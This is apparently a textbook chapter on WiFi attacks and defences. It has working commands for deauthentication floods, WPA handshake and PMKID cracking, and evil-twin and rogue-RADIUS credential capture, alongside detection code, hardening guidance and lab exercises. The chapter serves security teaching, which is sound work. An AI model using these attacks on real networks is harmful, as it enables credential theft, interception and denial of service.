Wireless Network Exploitation
WiFi attacks, WPA/WPA2/WPA3 security, evil twin attacks, rogue access points, and wireless defense strategies
Chapter 8: Wireless Network Exploitation
The KRACK Attack
In October 2017, security researcher Mathy Vanhoef of KU Leuven (Belgium) published research that shook the wireless security world: KRACK (Key Reinstallation Attacks). This vulnerability affected virtually every WiFi device on the planet.
KRACK exploited a flaw in the WPA2 four-way handshake. By manipulating cryptographic handshake messages, an attacker could trick devices into reinstalling an already-in-use encryption key, resetting associated nonce values. This broke the mathematical assumptions underlying WPA2's security, allowing attackers to decrypt packets and potentially inject malicious data.
The vulnerability was particularly severe on Linux and Android devices, where the key could be reset to all zeros, effectively disabling encryption entirely. For months, billions of devices were vulnerable while vendors scrambled to release patches.
KRACK demonstrated that even well-designed security protocols can harbor implementation vulnerabilities. This chapter explores wireless network exploitation, from classic WEP attacks to modern WPA3 considerations, and the techniques both attackers and defenders use.
Wireless Attack Surface
Wireless networks broadcast through physical space, making them inherently more accessible to attackers than wired networks.
Wireless Attack Surface:

PHYSICAL LAYER ATTACKS:
- RF jamming/interference
- Deauthentication floods
- Signal interception
- Beacon flooding

AUTHENTICATION ATTACKS:
- WEP cracking
- WPA/WPA2 dictionary attacks
- WPA handshake capture
- PMKID attacks
- 802.1X bypass
- Evil twin attacks

POST-CONNECTION ATTACKS:
- ARP spoofing (same as wired)
- MITM attacks
- Traffic interception
- Captive portal bypass

MANAGEMENT FRAME ATTACKS:
- Deauthentication attacks
- Disassociation attacks
- Rogue AP detection evasion
- Hidden SSID discovery
MITRE ATT&CK Reference
Wireless attacks map to:
- T1557 - Adversary-in-the-Middle
- T1557.002 - ARP Cache Poisoning
- T1040 - Network Sniffing
- T1200 - Hardware Additions
- T1599 - Network Boundary Bridging
Wireless Reconnaissance
Passive Reconnaissance
Monitor wireless traffic without transmitting anything. Because no frames are sent, passive monitoring cannot be detected over the air.
```bash
# Enable monitor mode
sudo airmon-ng start wlan0

# Passive scanning with airodump-ng
sudo airodump-ng wlan0mon

# Output shows:
# BSSID              PWR  Beacons  #Data  CH  ENC   ESSID
# AA:BB:CC:DD:EE:FF  -45      100    500   6  WPA2  CorpNetwork
# 11:22:33:44:55:66  -70       50    100   1  WPA2  GuestNet

# Capture to file
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
```
Active Reconnaissance
Hidden SSID Discovery:
```bash
# Hidden networks show a blank ESSID in airodump-ng
# Wait for a client probe request, or force one:
# deauthenticate a client so it reconnects
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

# The client reconnects and reveals the SSID in its probe request,
# which then appears in the airodump-ng output
```
Wireless Survey Information
| Discovery | Information Gained |
|---|---|
| BSSID | Access point MAC address |
| ESSID | Network name |
| Channel | Operating frequency |
| Encryption | WEP/WPA/WPA2/WPA3/Open |
| Cipher | TKIP/CCMP |
| Auth | PSK/Enterprise |
| Signal | Distance estimation |
| Clients | Connected devices |
| Vendor | AP manufacturer (from OUI) |
WEP Attacks (Legacy)
WEP Vulnerability Overview
WEP (Wired Equivalent Privacy) has fundamental cryptographic flaws making it trivially breakable.
WEP Vulnerabilities:

1. SHORT IV (24 bits):
   - Only about 16 million (2^24) possible IVs
   - A high-traffic network reuses IVs within hours
   - Same IV under the same key = identical keystream

2. WEAK IV PROBLEM:
   - Some IVs leak key information
   - With enough weak IVs, the key is recoverable

3. NO REPLAY PROTECTION:
   - Captured packets can be replayed
   - Used to generate traffic for IV collection

4. CRC-32 INTEGRITY:
   - Not a cryptographic check
   - Packets can be modified without detection
WEP Cracking (PTW Attack)
```bash
# Modern WEP cracking requires ~40,000 data packets
# Can be done in minutes on an active network

# Step 1: Start capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon

# Step 2: Generate traffic (ARP replay attack)
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon

# Step 3: Crack key (once enough IVs captured)
sudo aircrack-ng wep_capture-01.cap

# Output:
# KEY FOUND! [ 12:34:56:78:9A ]
```
**WEP Is Obsolete**
WEP should never be used. If you encounter WEP in a security assessment, immediate remediation should be recommended. Modern attacks can crack WEP keys in under 5 minutes.
WPA/WPA2 PSK Attacks
Four-Way Handshake Capture
WPA/WPA2-PSK security depends on a pre-shared key. The handshake can be captured and subjected to offline dictionary attacks.
WPA2 Four-Way Handshake:

```text
Client (STA)                                     Access Point (AP)
     |                                                   |
     |<-------------- Message 1: ANonce -----------------|
     |                                                   |
     |  Client derives PTK from:                         |
     |   - PSK (pre-shared key)                          |
     |   - ANonce (from AP)                              |
     |   - SNonce (generated)                            |
     |   - MAC addresses                                 |
     |                                                   |
     |-------------- Message 2: SNonce + MIC ----------->|
     |                                                   |
     |                       AP derives the same PTK     |
     |                       and verifies the MIC        |
     |                                                   |
     |<-------------- Message 3: GTK + MIC --------------|
     |                                                   |
     |---------------- Message 4: ACK ------------------>|
     |                                                   |
     |<=========== ENCRYPTED COMMUNICATION =============>|
```

ATTACK: Capture the handshake, then try PSK guesses offline.
If a guess produces a valid MIC, the PSK is cracked.
Capturing the Handshake
```bash
# Method 1: Wait for a natural handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
# Wait for the "WPA handshake: AA:BB:CC:DD:EE:FF" message

# Method 2: Force a handshake with deauth
# Terminal 1: Continue capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon

# Terminal 2: Send deauth to force reconnection
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Client disconnects, reconnects, handshake captured!
```
Cracking the Handshake
Using aircrack-ng:

```bash
# Dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap

# If successful:
# KEY FOUND! [ SuperSecretPassword123 ]
```

Using hashcat (GPU acceleration):

```bash
# Convert to hashcat format (-j writes the older .hccapx format)
aircrack-ng -j wpa_hash wpa_capture-01.cap

# Or use hcxpcapngtool for the current hc22000 format
hcxpcapngtool -o hash.hc22000 wpa_capture-01.cap

# Run hashcat (WPA-PBKDF2-PMKID+EAPOL = mode 22000)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# GPU cracking is MUCH faster
# Modern GPU: millions of passwords/second
```
PMKID Attack (2018)
The PMKID attack captures key material from a single AP frame; no connected client is needed.
PMKID Attack:

Traditional: need a handshake (requires a client connection)
PMKID: only need the first frame from the AP!

How it works:
- The AP includes an optional PMKID in Message 1 (RSN IE)
- PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || STA_MAC), i.e. the first 128 bits of the HMAC

Attack:
1. Send an association request to the AP
2. The AP responds with Message 1 containing the PMKID
3. Crack the PMKID offline (same PBKDF2 guess-and-check as handshake cracking)

Benefits:
- No client needed (idle networks can be attacked)
- Faster capture (single frame)
- Works against WPA2-PSK networks with roaming support
PMKID Capture:

```bash
# Using hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=3

# Or with a targeted approach
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2

# Convert and crack
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 pmkid.hc22000 wordlist.txt
```
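As an added example (not code from the chapter or from hashcat), here is the offline check a cracker performs on a PMKID record, written with the standard library so the computation is visible: PBKDF2 turns the passphrase into the PMK, and HMAC-SHA1 truncated to 128 bits turns the PMK into the PMKID. The same PBKDF2 step produces the PMK behind the four-way handshake above, which is why passphrase entropy is the only thing protecting either. The ESSID, MAC addresses and passphrase are constructed lab values.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # This is the expensive step; every guess has to pay for it.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): first 16 bytes of the HMAC.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def parse_hc22000(line: str) -> dict:
    # hcxpcapngtool line layout: WPA*TYPE*PMKID_OR_MIC*MAC_AP*MAC_CLIENT*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR
    # Only TYPE 01 (PMKID) records are handled; TYPE 02 (EAPOL) needs the full PTK/MIC computation.
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError("not a hc22000 record")
    if fields[1] != "01":
        raise ValueError("only PMKID (type 01) records are supported here")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap_mac": bytes.fromhex(fields[3]),
        "sta_mac": bytes.fromhex(fields[4]),
        "essid": bytes.fromhex(fields[5]).decode(),
    }

def pmkid_matches(record: dict, candidate: str) -> bool:
    # One offline guess: derive the PMK from the candidate, recompute the PMKID, compare.
    pmk = derive_pmk(candidate, record["essid"])
    computed = derive_pmkid(pmk, record["ap_mac"], record["sta_mac"])
    return hmac.compare_digest(computed, record["pmkid"])

def build_record(passphrase: str, essid: str, ap_mac_hex: str, sta_mac_hex: str) -> str:
    # Constructs a hc22000 PMKID record for a lab network whose passphrase you already know,
    # so the checker can be exercised without any capture file.
    ap, sta = bytes.fromhex(ap_mac_hex), bytes.fromhex(sta_mac_hex)
    pmkid = derive_pmkid(derive_pmk(passphrase, essid), ap, sta)
    return f"WPA*01*{pmkid.hex()}*{ap_mac_hex}*{sta_mac_hex}*{essid.encode().hex()}***"

# Constructed lab values (not from any real capture)
LAB_RECORD = build_record("correct horse battery staple", "LabNet", "aabbccddeeff", "112233445566")

if __name__ == "__main__":
    rec = parse_hc22000(LAB_RECORD)
    for guess in ["password123", "LabNet2023", "correct horse battery staple"]:
        print(f"{guess!r}: {'MATCH' if pmkid_matches(rec, guess) else 'no'}")
```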
Evil Twin Attacks
Attack Overview
Create a fake access point impersonating a legitimate network to capture credentials or conduct MITM attacks.
Evil Twin Attack:

```text
SETUP:
                     Legitimate AP (AA:BB:CC:DD:EE:FF)
                     SSID: "CorpWiFi", channel 6
                        ^
                        |
   Victim device  ------+
                        |
                        v
                     Evil Twin AP (same SSID "CorpWiFi", stronger signal)
                     Channel 1 (or the same channel)
                     Under attacker control
```

ATTACK FLOW:
1. Create an AP with the same SSID
2. Optionally deauth clients from the legitimate AP
3. Victims connect to the stronger/closer evil twin
4. Attacker controls all traffic

CREDENTIAL CAPTURE:
- Captive portal requesting the WPA password
- Fake corporate login page
- MITM on all traffic
Evil Twin with Captive Portal
```bash
# Using hostapd-wpe or eaphammer
# Create hostapd config
cat > evil_twin.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=CorpWiFi
hw_mode=g
channel=6
wmm_enabled=0
auth_algs=1
wpa=0
EOF

# Start AP
sudo hostapd evil_twin.conf

# Set up DHCP
sudo dnsmasq -i wlan0 --dhcp-range=192.168.1.2,192.168.1.254,255.255.255.0,12h

# Redirect to captive portal
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

# Run credential capture web server
python captive_portal.py
```
Using Fluxion (Automated):

```bash
# Fluxion automates evil twin + captive portal attacks
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
./fluxion.sh

# Interactive menu:
# 1. Select target network
# 2. Capture handshake
# 3. Create evil twin with captive portal
# 4. Deauth original clients
# 5. Capture entered passwords
# 6. Verify against handshake
```
WPA Enterprise Attacks
PEAP/EAP-TTLS Attack
Capture and crack enterprise credentials using rogue RADIUS server.
WPA-Enterprise Attack:

```text
LEGITIMATE FLOW:
Client ---> AP ---> RADIUS Server
                    (client validates the server certificate)
                    (server authenticates the user)

ATTACK FLOW:
Client ---> Evil Twin AP ---> Rogue RADIUS
                              (self-signed cert)
                              (captures credentials)
```

If the client doesn't validate the certificate:
- Username captured
- Password/hash captured (MSCHAPv2)
Using hostapd-wpe:

```bash
# hostapd-wpe patches hostapd for credential capture
# Configure for enterprise attack
cat > eap_user << 'EOF'
* PEAP,TTLS
"t" MSCHAPV2 "t" [2]
EOF

# Run hostapd-wpe
sudo hostapd-wpe hostapd-wpe.conf

# Captured credentials appear in hostapd-wpe.log
# MSCHAPv2 hashes can be cracked with hashcat
hashcat -m 5500 captured_hash.txt wordlist.txt
```
Certificate Validation Bypass
Many enterprise clients don't properly validate RADIUS server certificates.
Certificate Issues:

WEAK CONFIGURATIONS:
- "Don't validate certificate" checked
- Certificate pinning disabled
- Any certificate accepted

ATTACK:
1. Evil twin presents a self-signed certificate
2. Victim accepts it (no validation)
3. Credentials captured

DEFENSE:
- Enforce certificate validation
- Pin a specific CA
- Use device certificates (EAP-TLS)
Deauthentication Attacks
Overview
802.11 management frames are unauthenticated, allowing attackers to forge deauthentication frames.
Deauthentication Attack:

Attacker sends a spoofed deauth frame:

```text
+--------------------------------------------+
| Frame Control: Deauthentication            |
| Destination:   Client MAC (or broadcast)   |
| Source:        AP MAC (SPOOFED)            |
| BSSID:         AP MAC                      |
| Reason:        "Inactivity" or similar     |
+--------------------------------------------+
```

The client receives it, believes the AP sent it, and disconnects immediately.

Uses:
- Force handshake capture
- DoS against the wireless network
- Drive clients to an evil twin
Deauth Flood

```bash
# Deauth single client
sudo aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon
# -0 = deauth attack
# 10 = number of deauths

# Deauth all clients (broadcast)
sudo aireplay-ng -0 0 -a AP_MAC wlan0mon
# 0 = continuous

# Using mdk4 for more sophisticated attacks
sudo mdk4 wlan0mon d -c 6    # Deauth on channel 6
```
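An added example, not from the chapter, showing the detection side of this section: a parser for deauthentication/disassociation frames that reads the header fields in the diagram above, and a flood check that flags a BSSID when deauths claiming to come from it arrive faster than a legitimate AP would send them. The sample frames, timestamps and the threshold are constructed assumptions; a WIDS such as Kismet applies the same idea to live captures.

```python
import struct
from collections import defaultdict

MGMT_TYPE, DEAUTH_SUBTYPE, DISASSOC_SUBTYPE = 0, 12, 10
REASON_NAMES = {1: "unspecified", 2: "previous authentication no longer valid",
                3: "STA is leaving", 4: "disassociated due to inactivity",
                7: "class 3 frame from non-associated STA"}

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt_frame(frame: bytes):
    # 802.11 header (FCS stripped): FC(2) Duration(2) Addr1=DA(6) Addr2=SA(6) Addr3=BSSID(6) SeqCtl(2).
    # Deauth/disassoc bodies start with a little-endian 16-bit reason code. Other frames return None.
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != MGMT_TYPE or subtype not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack("<H", frame[24:26])
    return {"kind": "deauth" if subtype == DEAUTH_SUBTYPE else "disassoc",
            "dst": mac_str(dst), "src": mac_str(src), "bssid": mac_str(bssid),
            "broadcast": dst == b"\xff" * 6,
            "reason": reason, "reason_name": REASON_NAMES.get(reason, "other")}

def max_in_window(times, window: float) -> int:
    # Largest number of timestamps that fall inside any span of `window` seconds.
    times, best, start = sorted(times), 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def detect_deauth_flood(capture, threshold: int = 5, window: float = 1.0) -> dict:
    # capture: iterable of (timestamp_seconds, raw_frame). Returns {bssid: peak_count} for each
    # BSSID that had more than `threshold` deauth/disassoc frames within any `window` seconds.
    per_bssid = defaultdict(list)
    for ts, raw in capture:
        parsed = parse_mgmt_frame(raw)
        if parsed:
            per_bssid[parsed["bssid"]].append(ts)
    peaks = {b: max_in_window(t, window) for b, t in per_bssid.items()}
    return {b: n for b, n in peaks.items() if n > threshold}

# Constructed sample frames (hex, FCS stripped): AP aa:bb:cc:dd:ee:ff, client 11:22:33:44:55:66.
DEAUTH_BCAST = bytes.fromhex("c0003a01" "ffffffffffff" "aabbccddeeff" "aabbccddeeff" "0000" "0700")
DEAUTH_CLIENT = bytes.fromhex("c0003a01" "112233445566" "aabbccddeeff" "aabbccddeeff" "1000" "0400")
BEACON = bytes.fromhex("80000000" "ffffffffffff" "aabbccddeeff" "aabbccddeeff" "2000"
                       "0000000000000000" "6400" "1104")

def sample_capture():
    # Eight broadcast deauths "from" the AP within 0.7 s, one beacon, one lone deauth 5 s later.
    return [(0.1 * i, DEAUTH_BCAST) for i in range(8)] + [(0.35, BEACON), (5.0, DEAUTH_CLIENT)]
```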
Protected Management Frames (802.11w)
802.11w (PMF) cryptographically protects management frames, preventing spoofed deauth.
802.11w Protection:

WITHOUT 802.11w:
- Deauth frames are unauthenticated and easily spoofed

WITH 802.11w:
- Deauth and disassociation frames carry a MIC computed with a key derived from the session
- An attacker without the session key cannot forge valid management frames

Adoption:
- Required for WPA3
- Optional for WPA2
- Must be enabled on both AP and client
WPA3 Security Improvements
WPA3 Features
WPA3 Security Enhancements:

1. SAE (Simultaneous Authentication of Equals):
   - Replaces the PSK handshake
   - Resistant to offline dictionary attacks
   - Forward secrecy (past traffic stays safe if the password is compromised later)

2. PROTECTED MANAGEMENT FRAMES (Required):
   - Mandatory 802.11w
   - Prevents deauth attacks

3. 192-BIT SECURITY MODE (WPA3-Enterprise):
   - Stronger cryptographic algorithms
   - Meets the NSA's CNSA Suite requirements

4. EASY CONNECT (DPP):
   - QR code based provisioning
   - Replaces WPS
Dragonblood Vulnerabilities (April 2019)
In April 2019, security researchers Mathy Vanhoef (KRACK discoverer) and Eyal Ronen published "Dragonblood", revealing that WPA3's SAE (Dragonfly) handshake had implementation vulnerabilities:
Dragonblood Attacks:

SIDE-CHANNEL ATTACKS:
- Timing leaks during the SAE handshake
- Cache-based attacks
- Allowed password partitioning attacks

DOWNGRADE ATTACKS:
- Force a WPA3 client to use WPA2 mode
- Then attack with traditional methods

STATUS:
- Vulnerabilities patched in implementations
- WPA3 is still more secure than WPA2
- Ensure devices have the latest updates

Researchers: Mathy Vanhoef (New York University Abu Dhabi) and Eyal Ronen (Tel Aviv University & KU Leuven)
Wireless Defense Strategies
Access Point Hardening
AP Security Checklist:

ENCRYPTION:
- Use WPA3 (or WPA2 minimum)
- Use AES-CCMP (not TKIP)
- Strong PSK (15+ characters, random)
- Enable PMF (802.11w)

AUTHENTICATION:
- WPA-Enterprise for corporate networks
- Proper certificate configuration
- Certificate validation enforced on clients
- EAP-TLS where possible

ACCESS CONTROL:
- MAC filtering (supplement, not primary)
- Client isolation enabled
- Separate guest network
- VLAN segmentation

MONITORING:
- Rogue AP detection enabled
- Wireless IDS/IPS
- Log authentication events
- Monitor for deauth floods
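As an added example (not from the chapter), the encryption and access-control items of the checklist mapped onto hostapd configuration keys: a small auditor that reads a hostapd.conf and reports each weak setting, run against a constructed open configuration of the same shape as the evil_twin.conf above and against a hardened WPA3-SAE one. The 15-character passphrase floor is the checklist's own figure; the hostapd keys used (wpa, wpa_key_mgmt, rsn_pairwise, ieee80211w, sae_password, ap_isolate) are real hostapd options, and the passphrase value is a constructed placeholder.

```python
def parse_hostapd_conf(text: str) -> dict:
    # hostapd.conf is key=value per line; lines starting with '#' are comments. Last assignment wins.
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit_hostapd(conf: dict) -> list:
    # Applies the AP checklist to hostapd keys; an empty list means these checks pass.
    findings = []
    wpa = int(conf.get("wpa", "0"))            # bit 1 = WPA1, bit 2 = WPA2/RSN
    key_mgmt = conf.get("wpa_key_mgmt", "").split()
    ciphers = (conf.get("wpa_pairwise", "") + " " + conf.get("rsn_pairwise", "")).split()
    if any(k.startswith("wep_key") for k in conf):
        findings.append("WEP keys configured: WEP is broken, remove it")
    if wpa == 0:
        findings.append("wpa=0: open network, traffic is unencrypted")
    if wpa & 1:
        findings.append("WPA1 enabled (wpa bit 1): legacy TKIP negotiation allowed")
    if "TKIP" in ciphers:
        findings.append("TKIP pairwise cipher allowed: use CCMP only")
    if wpa and "SAE" not in key_mgmt:
        findings.append("no SAE in wpa_key_mgmt: a captured handshake or PMKID can be cracked offline")
    if "WPA-PSK" in key_mgmt and len(conf.get("wpa_passphrase", "")) < 15:
        findings.append("wpa_passphrase shorter than 15 characters")
    if wpa and conf.get("ieee80211w", "0") != "2":
        findings.append("ieee80211w != 2: PMF not required, deauth frames can be spoofed")
    if conf.get("ap_isolate", "0") != "1":
        findings.append("ap_isolate=0: clients can reach each other directly")
    return findings

# Constructed configs: the first mirrors the open evil_twin.conf shape, the second applies the checklist.
WEAK_CONF = "interface=wlan0\nssid=CorpWiFi\nchannel=6\nauth_algs=1\nwpa=0\n"
HARDENED_CONF = """interface=wlan0
ssid=CorpWiFi
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
# PMF (802.11w) required; mandatory for WPA3
ieee80211w=2
# constructed placeholder passphrase, not a real one
sae_password=LabOnly-Constructed-Passphrase-Placeholder
ap_isolate=1
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_hostapd(parse_hostapd_conf(text)) or ["passes checks"])
```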
Client Security
```bash
# Remove saved networks for untrusted locations
# Disable auto-connect
# Validate certificates for enterprise WiFi

# Windows - Forget network
netsh wlan delete profile name="NetworkName"

# Linux - Remove saved connection
nmcli connection delete "NetworkName"

# macOS - Remove from keychain
# System Preferences -> Network -> WiFi -> Advanced -> Remove
```
Wireless IDS/IPS
| Tool | Description |
|---|---|
| Kismet | Wireless network detector, sniffer, IDS |
| Waidps | Wireless intrusion detection |
| OpenWIPS-ng | Open source wireless IPS |
| Cisco WLC | Enterprise WIPS (commercial) |
| Aruba/HPE | Enterprise wireless security |
```bash
# Kismet setup for detection
kismet -c wlan0mon

# Detects:
# - Rogue APs
# - Deauth floods
# - Evil twins
# - MAC spoofing
```
Lab Exercise: Wireless Attack Analysis
Objective
Understand wireless attacks in a controlled lab environment.
Environment
Lab Setup:
- Attacker: Kali Linux with a compatible wireless adapter
- Access Point: your test AP (NOT production networks!)
- Client: test device (laptop, phone)
- IMPORTANT: isolated lab network only!
Exercise 1: Reconnaissance
```bash
# Enable monitor mode
sudo airmon-ng start wlan0

# Scan for networks
sudo airodump-ng wlan0mon

# Identify:
# - Network names
# - Encryption types
# - Channels
# - Connected clients

# Stop when done
sudo airmon-ng stop wlan0mon
```
Exercise 2: Handshake Capture (Your Own Network)
```bash
# On YOUR test network only
sudo airodump-ng -c YOUR_CHANNEL --bssid YOUR_AP_MAC -w test wlan0mon

# Disconnect your test client
# Watch for handshake capture

# Verify capture
aircrack-ng test-01.cap
# Should show "1 handshake"
```
Exercise 3: Understanding Deauthentication
```bash
# Capture management frames
sudo tcpdump -i wlan0mon -w deauth.pcap 'subtype deauth'

# Analyze in Wireshark
# Observe:
# - Frame structure
# - Reason codes
# - Source/destination
```
Key Takeaways
- WEP is broken: never use it, and recommend immediate remediation
- WPA2-PSK can be cracked if the password is weak: use 15+ character random passwords
- The PMKID attack doesn't require a client: it captures from a single AP frame
- Evil twin attacks impersonate legitimate networks: verify the certificate on enterprise networks
- 802.11w (PMF) prevents deauth attacks: enable it on all devices that support it
- WPA3 provides significant security improvements: deploy it when available
Self-Assessment
- Comprehension: Why does the PMKID attack not require a connected client?
- Application: A client is reporting their password was stolen even though they use WPA2-Enterprise. How might this have happened?
- What if: You're asked to assess a WiFi network using WPA2-PSK with a 20-character password. What's your attack strategy?
Review Questions
- Why is WEP fundamentally broken and unrepairable?
- Explain the four-way handshake and where the vulnerability lies.
- How does the PMKID attack differ from traditional handshake capture?
- What is an evil twin attack, and how does it capture credentials?
- How does 802.11w protect against deauthentication attacks?
- What security improvements does WPA3 provide over WPA2?
MITRE ATT&CK Mapping
| Attack | Technique ID | Tactic |
|---|---|---|
| WPA Cracking | T1040 | Credential Access |
| Evil Twin | T1557 | Credential Access |
| Deauthentication | T1499.002 | Impact |
| Rogue AP | T1200 | Initial Access |
| Credential Capture | T1110 | Credential Access |